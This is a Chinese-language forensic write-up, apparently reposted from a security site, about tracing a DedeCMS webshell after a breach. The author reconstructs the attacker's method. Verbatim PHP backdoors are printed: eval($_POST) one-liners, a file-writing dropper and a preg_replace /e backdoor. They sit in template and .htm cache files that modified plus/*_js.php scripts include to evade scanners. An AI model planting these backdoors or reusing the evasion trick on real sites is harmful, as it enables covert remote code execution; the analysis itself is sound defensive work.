单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.
为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?
无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件,文件代码如下:
|
{
dede
:
php
}
file_put_contents
(’
90sec.php’
,'
&
lt
;
?
php
eval
(
$
_POST
[
guige
]
)
;
?
&
gt
;’
)
;
{
/
dede
:
php
}
|
但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。
最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:
|
&
lt
;
!–
document
.
write
(“
dedecmsisok
&
lt
;
?
php
@
eval
(
$
_POST
[
cmd
]
)
;
?
&
gt
;”
)
;
–
&
gt
;
|
|
&
lt
;
!–
document
.
write
(“
&
lt
;
?
php
$
fp
=
@
fopen
(‘
av
.
php’
,
‘
a’
)
;
@
fwrite
(
$
fp
,
‘
&
lt
;
?
php
eval
(
$
_POST
[
110
]
)
?
&
gt
;
axxxxx’
)
;
echo
‘
OK’
;
@
fclose
(
$
fp
)
;
?
&
gt
;”
)
;
–
&
gt
;
|
|
&
lt
;
!–
document
.
write
(“
&
lt
;
?
php
echo
‘
dedecms
5.7
0day
&
lt
;
br
&
gt
;
guige
,
90sec.org’
;
@
preg_replace
(‘
/
[
copyright
]
/
e’
,
$
_REQUEST
[
'guige'
]
,’
error’
)
;
?
&
gt
;”
)
;
–
&
gt
;
|
看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时 间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:
看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改 plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话 了.
http://www.91ri.org /plus/mytag_js.php?id=1208
http://www.91ri.org /plus/ad_js.php?id=1
具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.
不怎么懂php,所以分析可能有差错的地方,欢迎指正!
link:http://www.nxadmin.com/penetration/1168.html
本文由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理,转载请注明出处。
作者
本站的投稿邮箱:tougao#91ri.org 你喜欢我们吗?帮我们点个广告吧亲~ :P